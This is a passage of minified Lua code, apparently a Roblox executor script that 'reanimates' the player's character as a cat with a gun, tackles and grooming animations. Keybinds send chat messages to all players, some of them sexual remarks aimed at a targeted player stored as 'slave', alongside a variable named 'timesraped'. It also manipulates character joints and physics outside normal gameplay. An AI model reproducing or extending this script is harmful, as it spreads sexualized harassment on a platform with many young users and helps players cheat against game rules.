=Instance.new("AlignOrientation",LL)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",RL)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",RL)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",i6)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",i6)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;a0=Instance.new("Attachment",RA)a1=Instance.new("Attachment",i7["Right Arm"])a2=Instance.new("Attachment",RA)RA.AlignPosition.Attachment0=a0;RA.AlignPosition.Attachment1=a1;RA.AlignOrientation.Attachment0=a2;RA.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",LA)a1=Instance.new("Attachment",i7["Left Arm"])a2=Instance.new("Attachment",LA)LA.AlignPosition.Attachment0=a0;LA.AlignPosition.Attachment1=a1;LA.AlignOrientation.Attachment0=a2;LA.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",RL)a1=Instance.new("Attachment",i7["Right Leg"])a2=Instance.new("Attachment",RL)RL.AlignPosition.Attachment0=a0;RL.AlignPosition.Attachment1=a1;RL.AlignOrientation.Attachment0=a2;RL.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",LL)a1=Instance.new("Attachment",i7["Left Leg"])a2=Instance.new("Attachment",LL)LL.AlignPosition.Attachment0=a0;LL.AlignPosition.Attachment1=a1;LL.AlignOrientation.Attachment0=a2;LL.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",i6)a1=Instance.new("Attachment",i7["Torso"])a2=Instance.new("Attachment",i6)i6.AlignPosition.Attachment0=a0;i6.AlignPosition.Attachment1=a1;i6.AlignOrientation.Attachment0=a2;i6.AlignOrientation.Attachment1=a1;RA.CFrame=CFrame.Angles(0,0,0)LA.CFrame=CFrame.Angles(0,0,0)i6.CFrame=CFrame.Angles(0,0,0)RL.CFrame=CFrame.Angles(0,0,0)LL.CFrame=CFrame.Angles(0,0,0)i7["Right Arm"].CFrame=CFrame.Angles(0,0,0)i7["Left Arm"].CFrame=CFrame.Angles(0,0,0)i7["Torso"].CFrame=CFrame.Angles(0,0,0)i7["Right Leg"].CFrame=CFrame.Angles(0,0,0)i7["Left Leg"].CFrame=CFrame.Angles(0,0,0)i7.HumanoidRootPart.Anchored=false;game:GetService("Workspace").CurrentCamera.CameraSubject=workspace[game:GetService("Players").LocalPlayer.Name].BIGBOI.Humanoid;spawn(function()while true do wait()if workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Humanoid").Health==0 then workspace[game:GetService("Players").LocalPlayer.Name]:BreakJoints()i7:BreakJoints()end end end)function nocol(i8)for T,v in pairs(workspace[game:GetService("Players").LocalPlayer.Name]:GetDescendants())do if v:IsA("BasePart")then HILOL=Instance.new("NoCollisionConstraint",v)HILOL.Part0=v;HILOL.Part1=i8 end end end;for T,v in pairs(i7:GetDescendants())do if v:IsA("BasePart")then nocol(v)end end;game:GetService("Workspace").CurrentCamera.CameraSubject=i7.Humanoid;RA.Anchored=true;i6.Anchored=true;LA.Anchored=true;RL.Anchored=true;LL.Anchored=true;workspace[game:GetService("Players").LocalPlayer.Name].Head.Anchored=true;game:GetService("Workspace").CurrentCamera.CameraSubject=workspace[game:GetService("Players").LocalPlayer.Name].BIGBOI.Humanoid;i7:MoveTo(game:GetService("Players").LocalPlayer.Character.Head.Position)game:GetService("UserInputService").JumpRequest:connect(function(i8)if i7.Humanoid.FloorMaterial~=Enum.Material.Air then i7.Humanoid.Jump=true end end)game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Anchored=true;if workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R6 then workspace[game:GetService("Players").LocalPlayer.Name].HumanoidRootPart.RootJoint:Destroy()elseif workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R15 then workspace[game:GetService("Players").LocalPlayer.Name].LowerTorso.Root:Destroy()end;Humanoid=game:GetService("Players").LocalPlayer.Character.Humanoid;game:GetService("RunService").RenderStepped:Connect(function()i7.Humanoid:Move(workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.MoveDirection,false)end)RA.Anchored=false;i6.Anchored=false;LA.Anchored=false;RL.Anchored=false;LL.Anchored=false;workspace[game:GetService("Players").LocalPlayer.Name].Head.Anchored=false;RemoteEvent=Instance.new("RemoteEvent")RemoteEvent.Name="PlayerWaiting.."RemoteEvent.Parent=game:GetService("ReplicatedStorage");local lt={12222152,1540443426,1043479800,610726103}local a=Instance.new("Sound",workspace)a.Volume=0;for T,v in pairs(lt)do a.SoundId="rbxassetid://"..v;while a.TimeLength==0 do wait()end end;a:Destroy()Debris=game:GetService("Debris")PhysicsService=game:GetService("PhysicsService")TweenService=game:GetService("TweenService")success,failure=pcall(function()PhysicsService:CreateCollisionGroup("TopLimbs")PhysicsService:CreateCollisionGroup("BottomLimbs")PhysicsService:CreateCollisionGroup("BignSmallLimbs")PhysicsService:CollisionGroupSetCollidable("TopLimbs","BignSmallLimbs",false)PhysicsService:CollisionGroupSetCollidable("BottomLimbs","BignSmallLimbs",false)end)interruptingaction=false;Character=nil;Playerr=nil;Tail=nil;RShoulder=nil;LShoulder=nil;RHip=nil;LHip=nil;Neck=nil;RJoint=nil;timesraped=0;slave=nil;shiftdown=false;walking=false;running=false;action=false;enabled=false;shotavailable=true;GunEquipped=false;shoutplaying=false;shooting=false;music=false;freefall=false;grabbed=false;song=nil;aro=false;on="true"local o=game:GetService("UserInputService")local lu=Enum.KeyCode.LeftShift;local function lv()return o:IsKeyDown(lu)end;Orange=Color3.new(244/255,119/255,70/255)Gun=Instance.new("Part")Gun.Size=Vector3.new(1,0.4,1)Gun.CanCollide=false;GunMesh=Instance.new("SpecialMesh")GunMesh.MeshId="http://www.roblox.com/asset/?id=4372594"GunMesh.Scale=Vector3.new(1.2,1.2,1.2)GunMesh.VertexColor=Vector3.new(1,1,1)GunGradient=Instance.new("Decal")GunGradient.Color3=Color3.new(1,1,1)GunGradient.Texture="http://www.roblox.com/asset/?id=156579757"GunGradient.Face="Top"GunWeld=Instance.new("Weld")GunWeld.C1=CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1)GunWeld.C0=CFrame.new(0.00025177002,-1.30018997,4.76837158e-05,1.00000012,-4.7326088e-05,8.3854422e-05,-8.38935375e-05,9.13441181e-06,1,-4.73186374e-05,-1,9.13441181e-06)GunMesh.Parent=Gun;GunGradient.Parent=Gun;GunWeld.Parent=Gun;Explosion1=Instance.new("Part")Explosion1.Shape="Ball"Explosion1.Transparency=0.4;Explosion1.Color=Color3.new(226/255,155/255,64/255)Explosion1.Size=Vector3.new(20.65,20.65,20.65)Explosion1.CanCollide=false;Explosion1.Material="SmoothPlastic"Explosion1.Anchored=true;Explosion2=Instance.new("Part")Explosion2.Shape="Ball"Explosion2.Transparency=0.5;Explosion2.Color=Color3.new(140/255,140/255,22/255)Explosion2.Size=Vector3.new(15.05,15.05,15.05)Explosion2.CanCollide=false;Explosion2.Material="SmoothPlastic"Explosion2.Anchored=true;SightModel=Instance.new("Model")SightModel.Name="LaserSight"GunHole=Instance.new("Part")GunHole.Shape="Cylinder"GunHole.Material="SmoothPlastic"GunHole.Size=Vector3.new(0.15,0.1,0.1)GunHole.CanCollide=false;GunHole.Anchored=false;GunHole.Color=Color3.new(17/255,17/255,17/255)GunHole.Parent=SightModel;GunSightBall=Instance.new("Part")GunSightBall.Shape="Ball"GunSightBall.Material="SmoothPlastic"GunSightBall.Size=Vector3.new(0.35,0.35,0.35)GunSightBall.CanCollide=false;GunSightBall.Anchored=false;GunSightBall.Color=Color3.new(99/255,95/255,98/255)GunSightBall.Parent=SightModel;GunSightCylinder=Instance.new("Part")GunSightCylinder.Shape="Cylinder"GunSightCylinder.Material="SmoothPlastic"GunSightCylinder.Size=Vector3.new(0.35,0.35,0.35)GunSightCylinder.CanCollide=false;GunSightCylinder.Anchored=false;GunSightCylinder.Color=Color3.new(99/255,95/255,98/255)GunSightCylinder.Parent=SightModel;GunLaser1=Instance.new("Part")GunLaser1.Shape="Cylinder"GunLaser1.Material="SmoothPlastic"GunLaser1.Size=Vector3.new(2.8,0.05,0.05)GunLaser1.CanCollide=false;GunLaser1.Anchored=false;GunLaser1.Color=Color3.new(1,0,0)GunLaser1.Transparency=1;GunLaser1.Parent=SightModel;GunLaser2=Instance.new("Part")GunLaser2.Shape="Cylinder"GunLaser2.Material="SmoothPlastic"GunLaser2.Size=Vector3.new(0.975,0.05,0.05)GunLaser2.CanCollide=false;GunLaser2.Anchored=false;GunLaser2.Color=Color3.new(1,0,0)GunLaser2.Transparency=1;GunLaser2.Parent=SightModel;GunLaser3=Instance.new("Part")GunLaser3.Shape="Cylinder"GunLaser3.Material="SmoothPlastic"GunLaser3.Size=Vector3.new(0.975,0.05,0.05)GunLaser3.CanCollide=false;GunLaser3.Anchored=false;GunLaser3.Color=Color3.new(1,0,0)GunLaser3.Transparency=1;GunLaser3.Parent=SightModel;Laser1Weld=Instance.new("Weld")Laser1Weld.C0=CFrame.new(1.36249876,0,0,1,0,0,0,1,0,0,0,1)Laser1Weld.Part0=GunHole;Laser1Weld.Part1=GunLaser1;Laser1Weld.Parent=SightModel;Laser2Weld=Instance.new("Weld")Laser2Weld.C0=CFrame.new(1.88750744,0,0,1,0,0,0,1,0,0,0,1)Laser2Weld.Part0=GunLaser1;Laser2Weld.Part1=GunLaser2;Laser2Weld.Parent=SightModel;Laser3Weld=Instance.new("Weld")Laser3Weld.C0=CFrame.new(0.975002289,0,0,1,0,0,0,1,0,0,0,1)Laser3Weld.Part0=GunLaser2;Laser3Weld.Part1=GunLaser3;Laser3Weld.Parent=SightModel;HoleWeld=Instance.new("Weld")HoleWeld.C0=CFrame.new(0.125,0,0,1,0,0,0,1,0,0,0,1)HoleWeld.Part0=GunSightCylinder;HoleWeld.Part1=GunHole;HoleWeld.Parent=SightModel;SightBallWeld=Instance.new("Weld")SightBallWeld.C0=CFrame.new(-0.175001144,5.96046448e-08,0,1,0,0,0,1,0,0,0,1)SightBallWeld.Part0=GunSightCylinder;SightBallWeld.Part1=GunSightBall;SightBallWeld.Parent=SightModel;CylinderToGunWeld=Instance.new("Weld")CylinderToGunWeld.C0=CFrame.new(0.0250000954,0.0750001669,-0.712492466,-8.6274035e-08,1.75032611e-07,1,3.56865471e-08,1,-1.75032596e-07,-1,3.56865257e-08,-8.62740421e-08)CylinderToGunWeld.Part1=GunSightCylinder;CylinderToGunWeld.Parent=SightModel;TailWeld=Instance.new("Weld")TailWeld.C1=CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1)Ring=Instance.new("Part")Ring.Name="Ring"Ring.Transparency=0.5;Ring.Anchored=true;Ring.CanCollide=false;Ring.Size=Vector3.new(0.01,0.01,0.01)RingMesh=Instance.new("SpecialMesh")RingMesh.MeshId="rbxassetid://3270017"RingMesh.Scale=Vector3.new(2,2,1)RingMesh.Parent=Ring;possibleshotnoise={"rbxassetid://71526392","rbxassetid://71526597","rbxassetid://78407890","rbxassetid://84318179","rbxassetid://19112123"}possiblefannoise={"ahh~ soft~","you're really soft owo","squishy.. eee..","squishy~","this is fun~","so fluffy..","you're a nice stress reliever..","please..?","i have a lot of feelings now >w<","aaahhhhhhh!","i don't want to let go..!","you're so cute!","aaaaaaaaaaahhhhh~","soft owo","i can't stop >w<","i love you!","fluffy owo"}gunraycastignorelist={}walksound=Instance.new("Sound")walksound.SoundId="rbxassetid://510932495"walksound.Name="Walk"walksound.Volume=3;brushsound=Instance.new("Sound")brushsound.SoundId="rbxassetid://131245944"brushsound.Name="Brush"brushsound.Volume=0.5;purring=Instance.new("Sound")purring.SoundId="rbxassetid://2046502717"purring.Name="c-cat_noises"purring.Volume=2;purring.Looped=true;cocksound=Instance.new("Sound")cocksound.SoundId="rbxassetid://361550324"cocksound.Name="GunSlide"cocksound.Volume=2;masksound=Instance.new("Sound")masksound.SoundId="rbxassetid://2706199011"masksound.Name="Mask"masksound.Volume=2;equipsound=Instance.new("Sound")equipsound.SoundId="rbxassetid://1498950813"equipsound.Name="Equip"equipsound.Volume=2;explosionsound=Instance.new("Sound")explosionsound.SoundId="rbxassetid://1776706665"explosionsound.Volume=4;explosionsound.PlayOnRemove=true;ShotMarker=Instance.new("Sound")ShotMarker.Name="ShotMarker"ShotMarker.SoundId="rbxassetid://296102734"ShotMarker.Volume=3;ShotMarker.PlayOnRemove=true;Useless=Instance.new("Sound")Useless.Name="Useless"Useless.SoundId="rbxassetid://3034338716"Useless.Volume=3;Useless.PlayOnRemove=true;Kill1=Instance.new("Sound")Kill1.Name="Kill1"Kill1.SoundId="rbxassetid://449759304"Kill1.Volume=0;Kill2=Instance.new("Sound")Kill2.Name="Kill2"Kill2.SoundId="rbxassetid://1854510736"Kill2.Volume=0;Kill3=Instance.new("Sound")Kill3.Name="Kill3"Kill3.SoundId="rbxassetid://1278706842"Kill3.Volume=0;DashJump=Instance.new("Sound")DashJump.Name="DashJump"DashJump.SoundId="rbxassetid://1295417556"DashJump.Volume=2;SmallSquish=Instance.new("Sound")SmallSquish.Name="SmallSquish"SmallSquish.SoundId="rbxassetid://162180713"SmallSquish.Volume=1;BigSquish=Instance.new("Sound")BigSquish.Name="BigSquish"BigSquish.SoundId="rbxassetid://1139819274"BigSquish.Volume=0.5;BodyFall=Instance.new("Sound")BodyFall.Name="BodyFall"BodyFall.SoundId="rbxassetid://178646271"BodyFall.Volume=2;Grab=Instance.new("Sound")Grab.Name="Grab"Grab.SoundId="rbxassetid://260411131"Grab.Volume=1.5;FlashlightClick=Instance.new("Sound")FlashlightClick.Name="FlashClick"FlashlightClick.SoundId="rbxassetid://242135745"FlashlightClick.Volume=4;YoshisIsland=Instance.new("Sound")YoshisIsland.Name="YoshisIsland"YoshisIsland.SoundId="rbxassetid://916843842"YoshisIsland.Volume=6;YoshisIsland.Pitch=3;YoshisIsland.Looped=true;lerpintensity=0.4;gunshotdamage=10;headshotdamage=21;explosionshotdamage=41;jumppower=60;if enabled==false then Playerr=game:GetService("Players").LocalPlayer.Character;repeat wait()until game:GetService("Players").LocalPlayer.Character~=nil;Character=game:GetService("Players").LocalPlayer.Character.Trash;gunraycastignorelist={Gun,Character}if Character.Head:FindFirstChild("Typing")==nil then local lw=Instance.new("Sound")lw.Name="Typing"lw.Parent=Character.Head;lw.SoundId="rbxassetid://903267862"walksound.Parent=Character.Torso;masksound.Parent=Character.Torso;equipsound.Parent=Character.Torso;Kill1.Parent=Character.Head;Kill2.Parent=Character.Head;Kill3.Parent=Character.Head;YoshisIsland.Parent=Character.Torso;DashJump.Parent=Character.Torso;BigSquish.Parent=Character.Torso;SmallSquish.Parent=Character.Torso;BodyFall.Parent=Character.Torso;Grab.Parent=Character.Torso;brushsound.Parent=Character.Head;purring.Parent=Character.Head;FlashlightClick.Parent=Gun;Character.Humanoid.DisplayDistanceType=Enum.HumanoidDisplayDistanceType.None;if Character:FindFirstChildOfClass("Pants")then Character:FindFirstChildOfClass("Pants"):Destroy()else end;wait()while wait()do for T,v in pairs(Character.Torso:GetChildren())do if v.ClassName=="Decal"then v:Remove()end end;if not Character.Head:FindFirstChild("bruh")then break end end end;wait()if Character:FindFirstChild("Tail")~=nil then Tail=Character:FindFirstChild("Tail")Tail.Handle.Size=Vector3.new(0.2,0.2,0.2)wait()if Tail:FindFirstChildOfClass("Weld")~=nil then Tail:FindFirstChildOfClass("Weld"):Remove()end;Tail.Handle.Mesh.Offset=Vector3.new(0.2,0.95,1.3)TailWeld.C0=CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1)TailWeld.Part0=Character.Torso;TailWeld.Part1=Tail.Handle;Character.Tail:Remove()end;Character.Humanoid.BreakJointsOnDeath=false;Character.Humanoid.JumpPower=jumppower;RShoulder=Character.Torso["Right Shoulder"]LShoulder=Character.Torso["Left Shoulder"]RHip=Character.Torso["Right Hip"]LHip=Character.Torso["Left Hip"]Neck=Character.Torso.Neck;RJoint=Character.HumanoidRootPart.RootJoint;GunWeld.Part0=Character["Right Arm"]GunWeld.Part1=Gun;CylinderToGunWeld.Part0=Gun;SightModel.Parent=Gun;Character.Humanoid:ClearAllChildren()for T,v in pairs(Character.Humanoid:GetPlayingAnimationTracks())do v:Stop()end;if Character:FindFirstChild("Animate")then Character.Animate:Destroy()end;Character.Humanoid.WalkSpeed=10;print("you're a cat now")enabled=true end;while wait()do if Character~=nil then break end end;Playerasd=game:GetService("Players").LocalPlayer;mouse=Playerasd:GetMouse()mouse.KeyDown:connect(function(dr)if dr=="c"then Tackle()end;if dr=="p"then number=math.random(1,2)if number==1 then local lx={[1]="B) [Neko]: this is my first time "..slave.Name..", Please be gentle!~",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end;if number==2 then local lx={[1]="wat [Neko]: this isnt my first time "..slave.Name.." you know?",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))wait(1)local lx={[1]="lel [Neko]: but it still feels good~",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end end;if dr=="v"then Groom()end;if dr=="b"then on="more"end;if dr=="n"then on="false"end;if dr=="x"then SoftTackle()end end)local function ly(D,ar)if not lv()then else Character.Humanoid.WalkSpeed=35;GunRunAnimation()end end;o.InputBegan:Connect(ly)function FallingAnimation()lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,-.01)lerpintensity=0.2;action=true;running=false;while true do if freefall==false then action=false;wait()if GunEquipped==true then if running==true then spawn(GunRunAnimation)elseif walking==true and running==false then spawn(GunWalkAnimation)elseif walking==false then spawn(GunIdleAnimation)end elseif GunEquipped==false then if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end;break end end;if freefall==false then action=false;return end;wait()lerpintensity=0.3;if Character.Torso.Velocity.Y<0 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,-0.0871549845,0.99619472,0,-0.99619472,-0.0871549845),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.400000572,1.30000114,9.53674316e-07,-0.022557538,-0.0841860026,0.996194601,-0.257833898,-0.962250412,-0.0871557221,0.965926051,-0.258818775,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.399997711,1.30000305,-3.81469727e-06,-0.0298090354,0.0818996206,-0.996194601,0.340718806,-0.936117053,-0.0871557221,-0.939692795,-0.342020392,-0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.926279843,0.0961994305,0.0663478896,0.142828107,0.987521231,0.334035039,0.929415584,-0.156866685,-0.940222502,0.340274423,0.0139551731),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.931063533,0.0745929778,0.0663478822,-0.142828137,-0.987521231,-0.334034681,0.929415822,-0.156866714,0.940222681,0.340274096,0.0139552038),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.996194661,-0.0871557891,0,-0.0871557891,-0.996194661),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,-0.545396805,0.604500771,-0.99999994,0,0,0,-0.866025329,-0.500000298,0,-0.500000298,0.866025329),lerpintensity)else RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.400000095,1.30000114,-1.90734863e-06,0.0225575734,-0.0841859803,0.99619472,0.257834256,-0.962250173,-0.087155737,0.965925813,0.258819193,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.399998188,1.30000019,0,0.0225575622,0.0841860026,-0.99619472,-0.257834107,-0.962250233,-0.0871557593,-0.965925813,0.258818954,-0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.926279843,0.0961994305,0.0663478896,0.142828107,0.987521231,-0.00768500799,0.989745677,-0.142633513,-0.997766912,0.00187429786,0.0667651743),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.931063533,0.0745929778,0.0663478822,-0.142828137,-0.987521231,0.00768518727,0.989745855,-0.142633542,0.997766972,0.00187411904,0.0667651817),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.939692616,0.342020094,0,0.342020094,-0.939692616),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,-0.0311697274,-0.00833471864,-1,0,0,0,-0.906307936,0.422617972,0,0.422617972,0.906307936),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,-0.499999166,0.866025865,0,-0.866025865,-0.499999166),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end end;W(R.torso.Handle,lr.Trash["Torso"])W(S.relaxative.Handle,lr.Trash["Head"])W(S.cyoot.Handle,lr.Trash["Head"])W(S.fwuffyeaws.Handle,lr.Trash["Head"])W(S.heir.Handle,lr.Trash["Head"])W(S.bloosh.Handle,lr.Trash["Head"])W(R.rightarm.Handle,lr.Trash["Right Arm"])W(R.leftarm.Handle,lr.Trash["Left Arm"])W(R.rightleg.Handle,lr.Trash["Right Leg"])W(R.leftleg.Handle,lr.Trash["Left Leg"])R.torso.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.rightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.rightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)lr.Trash:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment1"lr.Trash:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment2"lr.Trash:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment5"lr.Trash:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment4"lr.Trash:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment3"lr.Trash:WaitForChild("Head").Attachment4.Position=Vector3.new(0,-0.5,0)lr.Trash:WaitForChild("Head").Attachment5.Position=Vector3.new(0,1,0)lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,-.01)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,0)function IdleAnimation()lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,-.01)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,0)lerpintensity=0.2;Character.Humanoid.WalkSpeed=10;while true do if walking==true or action==true or GunEquipped==true or running==true then break end;for T=1,15 do wait()if walking==true or action==true or GunEquipped==true or running==true then return end;if T<7 then Character.Torso:WaitForChild("Right Shoulder")RShoulder=Character.Torso["Right Shoulder"]pcall(function()TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.20000005,0,0,0,1,-0.707106888,0.707106709,0,-0.707106709,-0.707106888,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.20000148,-1.90734863e-06,3.70101283e-10,0,-1,0.707106888,0.707106769,0,0.707106769,-0.707106888,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.126279831,0.0961994305,0.0667652041,0.0560225844,0.99619472,0.76312983,0.640341103,-0.087155737,-0.642787099,0.766044855,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.131063491,0.0745929778,0.0667652115,-0.0560226105,-0.99619472,-0.763129652,0.640341401,-0.0871557593,0.642787337,0.766044736,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.422618061,0.906307876,0,0.906307876,-0.422618061),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.2688303,0.591665268,-1,0,0,0,-0.422618449,0.906307697,0,0.906307697,0.422618449),lerpintensity)end)else TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.20000005,0,0,0,1,-0.642787874,0.766044259,0,-0.766044259,-0.642787874,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.20000148,-1.90734863e-06,3.70101283e-10,0,-1,0.642787755,0.766044438,0,0.766044438,-0.642787755,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.126281738,0.0961997509,0.0754791126,0.0435778275,0.99619472,0.862730145,0.498097032,-0.087155737,-0.499999672,0.866025746,1.58324838e-08),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.131063461,0.0745928288,0.0754791275,-0.0435778424,-0.99619472,-0.862729967,0.498097211,-0.0871557593,0.499999851,0.866025507,1.62981451e-08),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.342020094,0.939692616,0,0.939692616,-0.342020094),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.30303288,0.497695923,-1,0,0,0,-0.342020512,0.939692497,0,0.939692497,0.342020512),lerpintensity)end end end end;function GunIdleAnimation()lerpintensity=0.1;while true do if walking==true or action==true or GunEquipped==false or running==true then break end;for T=1,30 do wait()if walking==true or action==true or GunEquipped==false or running==true then return end;if T<15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.199999988,0.500000119,-0.800000012,0,0.087155737,0.99619472,-8.74227766e-08,-0.99619472,0.087155737,1,-8.70901076e-08,7.61939667e-09),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.100001812,0.691286087,0.900381088,0,1,2.98023224e-08,0.0871555507,-2.96889162e-08,0.99619472,0.99619472,2.59743782e-09,-0.0871555507),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,1.71363354e-07,1.00000012,0,1.00000012,-1.71363354e-07),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)else TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.912786424,0.408437282,0,-0.408437282,0.912786424),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.182569504,0.300760746,-0.799999237,-7.61939578e-09,-7.4505806e-09,1.00000012,-0.0871556401,-0.996194839,-8.08630141e-09,0.99619472,-0.0871556476,6.9410433e-09),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.100001812,0.691286087,0.900381088,-0.00759610627,0.99619472,-0.086824052,0.086823903,0.0871557072,0.992403924,0.99619472,2.59743782e-09,-0.0871555507),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.899999976,0.100000001,0,0,1,0.087155737,0.99619472,0,-0.99619472,0.087155737,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.899999976,0.1000